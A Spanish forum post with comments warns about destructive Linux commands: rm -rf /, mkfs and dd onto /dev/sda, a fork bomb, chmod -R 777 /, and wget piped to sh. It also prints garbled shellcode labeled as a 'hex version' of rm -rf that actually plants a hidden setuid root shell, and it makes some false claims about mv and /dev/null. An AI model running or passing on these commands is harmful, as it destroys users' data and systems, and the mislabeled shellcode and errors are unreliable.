epelpad

9 Comandos Peligrosos que debes conocer

Todos los que conocemos GNU/Linux sabemos que con la cuenta de root podemos hacer muchas maravillas así como grandes desastres, y es por eso que muchas distribuciones limitan el acceso a esta cuenta o incorporan shells adicionales para modificar cambios peligrosos en el sistema.

9 Comandos Peligrosos que debes conocer

Existe una serie de comandos que han ganado fama por su capacidad de daño:

comandos

1) Eliminar casi todo

rm -rf /


Al ejecutar este comando se borraran casi todos los archivos de sistema(salvo los archivos de procesos en la carpeta /proc

versión hexadecimal:

char esp[] __attribute__ ((section(".text")) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
-


peligrosos

2)Formateo del sistema

mkfs.ext3 /dev/sda


Formatea el disco o dispositivo sda , con la desaparición de todos los archivos presentes en él

conocer

3) Bomba Fork

Una bomba fork es una forma de ataque del tipo DoS (causa que un servicio o recurso sea inaccesible a los usuarios) que implementa la operación fork (creación de una copia de sí mismo), o alguna funcionalidad equivalente mediante la cual un proceso es capaz de crear otro proceso.

Resumiendo, una bomba fork es un proceso que se copia a si mismo muchas veces para colapsar tu sistema. Y aclarando falsos mitos, no es una bomba lógica, ni tampoco un fallo del kernel, ni mucho menos se trata de algo liberado por uno de los programadores del kernel.

){:&};:


Aunque puede tener varias, como por ejemplo:

ubunteate(){ ubunteate|ubunteate& };ubunteate


Pero tal cosa podemos prevenirla, editando el archivo adecuado:

$ sudo gedit /etc/security/limits.conf


Ahora localizaremos, al final del archivo, la siguiente línea:

# End of file


Pues justo encima de esa, podemos introducir la siguiente línea:

* hard nproc 1000


Quedando así las dos últimas líneas del archivo:

* hard nproc 1000
# End of file


Guardamos y cerramos el archivo y listo.

mira

4) Colapsar el Sistema de Archivos

Si ejecutamos:

# cualquier-comando > /dev/sda


Como por ejemplo:

# ls > /dev/sda


Con este comando, se envían bloques de datos al dispositivo indicado, lo cual a menudo puede colapsar el sistema de archivos, dando como resultado una perdida total de datos.

nueve

5) Ejecutar un script de forma automática

En algunos foros linuxeros nos dicen que descarguemos un script con el siguiente código:

$ wget http://web.com/script.sh O | sh


O peor aún, como root:

# wget http://web.com/script.sh O | sh


o que hace este comando es descargar y ejecutar inmediatemente el script. Imaginense si uno de esos scripts contiene uno de los comandos que explico acá
uds. tendrían su sistema GNU/Linux, MacosX o cualquier derivado de UNIX ya destruído. Recomiendo sólo descargar el código y examinarlo antes de ejecutarlo y obtenerlo sólo de fuentes confiables.

9 Comandos Peligrosos que debes conocer

6)Mover un archivo

El comando mv sirve para cambiar la ubicación de un archivo

$ mv directorio-o-archivo-a-mover directorio-al-que-mover


Como por ejemplo:

$ mv ~/script.sh ~/Documentos


Pero debes evitar que el directorio destino sea /dev/null, pues es un directorio inexistente, y jamás podrás obtener de nuevo esos archivos, por ejemplo:

$ mv ~/script.sh /dev/null


Eso hará desaparecer para siempre el script. Pero aún es peor si ejecutas, por ejemplo:

$ mv ~ /dev/null


Lo cual eliminará para siempre tu carpeta de usuario, con tus imágenes, vídeos, música, documentos, etc. Podemos comprobar la no existencia de ese directorio, vayamos primero al directorio /dev, el cual, supuestamente aloja null.:

$ cd /dev


Lo cual no genera ningún problema, y vamos a buscar ahora null:

$ ls


Lista demasiado grande para ponerse a buscar, mejor facilitarnos la vida:

$ ls | grep null


Si nos devuelve null, que lo hará, es que existe, pero eso no nos confirma que sea una carpeta, para ello utilizaremos:

$ ls -d


Que solo nos mostrará las carpetas, aunque también podemos filtrarlo por la palabra null:

$ ls -d | grep null


Y no les devolverá nada, porque no ha encontrado null como carpeta. Aún puedes probar:

$ cd null


Y nos dirá que no es un directorio. Por lo tanto, fijarse bien cuando se mueva algo.

comandos

7) Rellenar el Disco Duro

También disponemos de un comando en Linux:

# dd if=/dev/urandom of=/dev/sda


Que simplemente rellena con datos aleatorios todo el espacio vacío en el disco duro, lo cual, como podemos imaginar, genera un caos tremendo en el sistema.

peligrosos

8) Te doy permiso para lo que quieras

También debemos de tener cuidado a la hora de dar permisos a los directorios y a las carpetas, como por ejemplo:

# chmod -R 777 /


Este comando da permisos totales a todos los directorios del sistema, ya que el comando chmod es el encargado de dar permisos, la opción R da permiso a todo lo contenido en el directorio, 777 es el mayor permiso posible, realmente inseguro y, la barrita, como dijimos anteriormente, es todo el sistema. Esto daría permiso a cualquier agente de hacer lo que sea con tu sistema, cuidado con el trío de los 7 y dónde los aplicas.

conocer

9) Te quito todos los permisos

# chmod -R -777 /


Este comando es el inverso del anterior , quita todos los permisos a todos los usuarios
y al ejecutarlo lo que tendrán será un hermoso signo ">" como shell y no podrán realizar nada. Este error lo cometió un ex-jefe mío en la empresa de Supermercados en la que yo trabajaba : en vez de denegar permisos a una carpeta específica , durante la instalación del Sistema de Ventas, denegó el acceso a la raíz y esto lo hizo en aquellos años en un servidor con Red Hat 9, llevándose consigo las "felicitaciones" del Sub-Gerente de Informática.

Pero yendo de nuevo al tema, otra variante es la de los tres ceros:

# chmod -R 000 /


Similar a la anterior elimina todos los accesos privilegiados a los usuarios en el sistema.

mira

Saludos

6 comentarios - 9 Comandos Peligrosos que debes conocer

DrKevorkian
Excelente!!!
Solo una duda con el comando
# dd if=/dev/urandom of=/dev/sda

Si lo ejecuto solo llena de datos aleatorios el disco o hace algo mas?
Mi pregunta es que muchas veces presto un disco externo, en el que tiendo a guardar expedientes. Si quiero evitar que recuperen algun dato, la simple accion de borrar o formatear el disco no me da seguridad alguna, con tantos programas que recuperan no lo veo viable.

Pero al leer sobre ese comando, estaba pensando que sino colpasa el sistema, podria ser una buena manera de sobreescribir todo el disco (dice espacio libre, pero imagino que si borro todo antes sirve) para recien ahi formatearlo y prestarlo sin miedo que vean algo.

Espero que se haya entendido
furimmerallein +1
Si utilizas ese comando se sobreescribe todo el contenido del disco con datos aleatorios, es como si el disco no tuviese nada en el, y es una forma de estar mas tranquilo si lo que borraste NO lo querias recuperar. Otra variante es una que llena de zeros el disco
# dd if=/dev/zero of=/dev/sda bs=1M 


la parted e bs=1M es solo para que vaya mas rapido.

Ademas hay algunos comandos para borrado seguro en varias pasadas, pero no recuerdo cuales.
gamborimbo
pregunta:
si alguien quiere ser malisioso puede meter algun comando de estos dentro de una linea de comandos mucho mayor y funcionar como si fuera un virus para linux?

supongo que si se podria, no ?
cesarzeta
Deberías ejecutarlo como root.
gamborimbo
si, claro, pero imaginate algo asi:
wget -c kernel.ubuntu.com/~kernel-ppa/mainline/v3.12-rc6-saucy/linux-headers-3.12.0-031200rc6-generic_3.12.0-031200rc6.201310191635_amd64.deb

si a eso le agregas ls > /dev/sda

wget -c kernel.ubuntu.com/~kernel-ppa/mainline/v3.12-rc6-saucy/linux-headers-3.12.0-031200rc6-generic_3.12.0-031200rc6.201310191635_amd64.deb ls > /dev/sda

algo asi podria dañar la maquina, supongo, se que la sintaxis no es correcta, es solo un ejemplo.
sonamy120
Me acuerdo que queria saber lo que habia en la swap cuando se estaba usando y ejecute # is /dev/sda2
Sacadodelamorgue
Ya los conocía, aunque la verdad no me interesan mucho, a lo mucho con esto podría dañar mi computadora y la idea no me es muy atractiva.